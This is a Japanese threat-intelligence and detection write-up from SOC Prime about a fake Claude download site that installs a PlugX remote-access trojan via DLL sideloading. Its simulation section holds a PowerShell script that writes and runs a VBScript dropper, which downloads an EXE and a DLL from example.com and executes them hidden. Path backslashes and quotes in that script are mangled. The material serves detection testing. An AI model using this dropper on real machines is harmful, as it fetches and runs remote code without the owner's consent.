SOC Prime Bias:

14 4月 2026 18:55

偽のClaudeサイト、攻撃者がコンピュータにアクセスするマルウェアをインストール

Author Photo
SOC Prime Team linkedin icon フォローする
偽のClaudeサイト、攻撃者がコンピュータにアクセスするマルウェアをインストール
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

攻撃者が偽のClaudeダウンロードページを設定し、疑いのないユーザーにトロイの木馬化されたZIPアーカイブを届けました。それを開くと、アーカイブは一見正当なClaudeデスクトップクライアントをインストールしつつ、署名されたG DATAアップデーターとDLLサイドローディングを介してPlugXリモートアクセス型トロイの木馬を密かに展開しました。この悪意のあるペイロードは、永続性を維持するためにユーザーのスタートアップフォルダーに配置され、その後、コマンド・アンド・コントロールサーバーとの外向きHTTPS通信を開始しました。このキャンペーンは、脅威アクターが最初の侵入として人気のあるAIツールへの関心を工夫したソーシャルエンジニアリングとしてどのように利用しているかを示しています。

調査

分析中、研究者はZIPアーカイブを解凍し、MSIインストールパスを特定し、実行をVBScriptドロッパーまで追跡しました。 NOVUpdate.exe 、悪意のある avk.dll 、および暗号化されたデータファイルをスタートアップフォルダーに書き込みました。サンドボックス実行により、サイドロードされたバイナリが正常に起動し、TCP/IP関連のレジストリキーを変更し、Alibaba CloudにホストされたIPアドレスへのポート443での外向き接続を開始することが確認されました。これらの発見により、正当なAIソフトウェアに見せかけた段階的な感染連鎖を通じてPlugXの配信が確認されました。

軽減策

ユーザーは、公式に検証されたソースからのみClaudeソフトウェアをダウンロードし、実行前にインストーラーパッケージの真正性を確認する必要があります。ディフェンダーは、新たにインストールされたアプリケーションに関連した不審な外向きHTTPSトラフィックを遮断するために、スタートアップフォルダーで予期しないバイナリやDLL、特に正当な更新コンポーネントを模倣するファイルを調査する必要があります。悪意のあるファイルを削除し、権限のないレジストリの変更を元に戻し、信頼できるアンチマルウェアスキャンを実行することが、脅威を抑えるための重要なステップです。

対応

セキュリティチームは、Startupディレクトリ内に NOVUpdate.exe, avk.dll 、または NOVUpdate.exe.dat が存在することを検知し、警告する必要があります。追加の検知は、信頼されていないDLLを読み込んで予期しないアウトバウンドTLSセッションを確立する、署名されたG DATAアップデーターバイナリに焦点を当てるべきです。影響を受けたホストは完全な復旧とフォレンジックレビューを受け、他のPlugXコンポーネント、持続メカニズム、追加ペイロードがアクティブではないことを確認する必要があります。

graph TB %% Class definitions classDef technique fill:#ffdd99 classDef file fill:#c2f0c2 classDef script fill:#d9d9ff classDef process fill:#f0c2c2 classDef persistence fill:#ffd9b3 classDef c2 fill:#b3e5fc classDef evasion fill:#e6b3ff classDef registry fill:#ffe699 %% Nodes u2013 Files and Artifacts node_spoofed_website[“<b>ファイル</b> – 偽のClaudeサイト<br/>悪意あるZIPをホスト”]:::file node_malicious_zip[“<b>ファイル</b> – 悪意あるZIP<br/>トロイ化されたMSIインストーラを含む”]:::file node_msi_installer[“<b>ファイル</b> – トロイ化MSIインストーラ”]:::file node_vbscript[“<b>スクリプト</b> – Claude AI.vbs<br/>ファイルコピー、起動、永続化設定”]:::script node_novupdate_exe[“<b>ファイル</b> – NOVUpdate.exe<br/>正規G DATAアップデータ(DLLサイドロード用)”]:::file node_avk_dll[“<b>ファイル</b> – avk.dll<br/>悪意あるDLL”]:::file node_dat_file[“<b>ファイル</b> – NOVUpdate.exe.dat<br/>暗号化ペイロード”]:::file node_startup_folder[“<b>ファイル</b> – スタートアップフォルダ<br/>コピー先”]:::file node_shortcut[“<b>ファイル</b> – Claude AI.lnk<br/>VBScriptを実行するショートカット”]:::file node_cleanup_batch[“<b>ファイル</b> – cleanup.bat<br/>悪性アーティファクト削除”]:::file node_registry_key[“<b>レジストリ</b> – HKLM\System\CurrentControlSet\Services\Tcpip\Parameters”]:::registry %% Nodes u2013 Techniques node_initial_access[“<b>技術</b> – T1204.002 ユーザー実行<br/>ZIPをダウンロードしMSIを実行”]:::technique node_execution[“<b>技術</b> – T1059.005 Visual Basic<br/>悪性VBScript実行”]:::technique node_persistence_startup[“<b>技術</b> – T1037.005 スタートアップ項目<br/>Startupへコピー”]:::persistence node_persistence_shortcut[“<b>技術</b> – T1547.009 ショートカット変更”]:::persistence node_appcert_dll[“<b>技術</b> – T1546.009 AppCert DLL<br/>DLLサイドローディング”]:::evasion node_obfuscation[“<b>技術</b> – T1027.009 難読化ファイル<br/>実行時に復号”]:::evasion node_registry_mod[“<b>技術</b> – T1012 レジストリ操作”]:::registry node_c2_proxy[“<b>技術</b> – T1090.002 プロキシ”]:::c2 node_c2_web[“<b>技術</b> – T1102 Webサービス”]:::c2 node_indicator_removal[“<b>技術</b> – T1070.010 痕跡削除”]:::evasion %% Flow Connections node_spoofed_website –>|hosts| node_malicious_zip node_malicious_zip –>|delivered via| node_msi_installer node_msi_installer –>|drops| node_vbscript node_msi_installer –>|drops| node_novupdate_exe node_msi_installer –>|drops| node_avk_dll node_msi_installer –>|drops| node_dat_file node_initial_access –>|leads to| node_msi_installer node_vbscript –>|executes| node_execution node_execution –>|enables| node_persistence_startup node_execution –>|creates| node_shortcut node_persistence_startup –>|copies to| node_startup_folder node_startup_folder –>|contains| node_novupdate_exe node_startup_folder –>|contains| node_avk_dll node_startup_folder –>|contains| node_dat_file node_persistence_shortcut –>|creates| node_shortcut node_persistence_shortcut –>|replaces with clean| node_shortcut node_appcert_dll –>|loads| node_avk_dll node_obfuscation –>|decrypts| node_dat_file node_registry_mod –>|modifies| node_registry_key node_c2_proxy –>|uses| node_c2_web node_indicator_removal –>|creates| node_cleanup_batch node_cleanup_batch –>|deletes| node_vbscript node_cleanup_batch –>|deletes| node_msi_installer %% Class Assignments class node_initial_access technique class node_execution technique class node_persistence_startup persistence class node_persistence_shortcut persistence class node_appcert_dll evasion class node_obfuscation evasion class node_registry_mod registry class node_c2_proxy c2 class node_c2_web c2 class node_indicator_removal evasion

攻撃フロー

シミュレーション実行

前提条件: テレメトリー&ベースラインのプレフライトチェックに合格している必要があります。

理論: このセクションは、検出ルールをトリガーするために設計された敵対者技術(TTP)の正確な実行を詳細に説明します。コマンドと説明は、検出ロジックによって期待される正確なテレメトリーを生成することを目的としており、抽象的または無関係な例は誤診につながります。

  • 攻撃の概要&コマンド:
    攻撃者が悪意のあるVBSスクリプトを作成し、ペイロードをダウンロードします。 NOVUpdate.exe コマンド・アンド・コントロール(C2)サーバーから %TEMP%に書き込み、次に wscript.exeを介して起動します。同じスクリプトは、DLLサイドローディングを達成するために同じ場所からも読み込みます。攻撃者は内蔵のWindowsスクリプトホスト(WSH)に頼り、従来のAVヒューリスティックからの疑いを避けます。 avk.dll from the same location to achieve DLL sideloading. The attacker relies on the built‑in Windows Script Host (WSH) to avoid raising suspicion from traditional AV heuristics.

    1. 悪意のあるVBSファイルを書く (malicious.vbs) への %TEMP%.
    2. 呼び出し wscript.exe VBSファイルのパスを指定して
    3. VBSスクリプトはHTTP GETを実行して NOVUpdate.exe and avk.dll(「%TEMP% NOVUpdate.exe 」)、ディスクに書き込み、実行します NOVUpdate.exe.
  • 回帰テストスクリプト:

    # --------------------------------------------------------------------
    # 悪意のあるドロッパーのシミュレーション – Sigmaルールをトリガー
    # --------------------------------------------------------------------
    $tempDir = "$env:TEMPDropperDemo"
    New-Item -ItemType Directory -Path $tempDir -Force | Out-Null
    
    # 1. 悪意のあるVBSを作成し、2つのファイルをダウンロードしNOVUpdate.exeを実行
    $vbsPath = "$tempDirmalicious.vbs"
    $vbsContent = @"
    Set objXML = CreateObject("Microsoft.XMLHTTP")
    objXML.open "GET", "http://example.com/NOVUpdate.exe", False
    objXML.send
    If objXML.Status = 200 Then
    Set objStream = CreateObject("ADODB.Stream")
    objStream.Type = 1
    objStream.Open
    objStream.Write objXML.ResponseBody
    objStream.SaveToFile "$tempDirNOVUpdate.exe", 2
    objStream.Close
    End If

‘ DLLサイドローディングに使用するavk.dll をダウンロード… objXML.open “GET”, “http://example.com/avk.dll“, False objXML.send If objXML.Status = 200 Then Set objStream = CreateObject(“ADODB.Stream”) objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile “$tempDiravk.dll”, 2 objStream.Close End If

‘ ドロップされたEXEを実行 CreateObject(“WScript.Shell”).Run “””$tempDirNOVUpdate.exe”””, 0, False “@ Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII

# 2. wscript.exe経由でスクリプトを実行(これがテレメトリーのテスト対象)
$wscript = "$env:SystemRootSystem32wscript.exe"
Start-Process -FilePath $wscript -ArgumentList "`"$vbsPath`"" -WindowStyle Hidden

# OPTIONAL: 検出を発火させるために一時停止
Start-Sleep -Seconds 10
# --------------------------------------------------------------------
  • クリーンアップコマンド:

    # シミュレーションによって作成されたすべてのアーティファクトを削除
    $tempDir = "$env:TEMPDropperDemo"
    if (Test-Path $tempDir) {
        Remove-Item -Path $tempDir -Recurse -Force
    }
    
    # 残ったNOVUpdate.exeプロセスがある場合は終了
    Get-Process -Name "NOVUpdate" -ErrorAction SilentlyContinue | Stop-Process -Force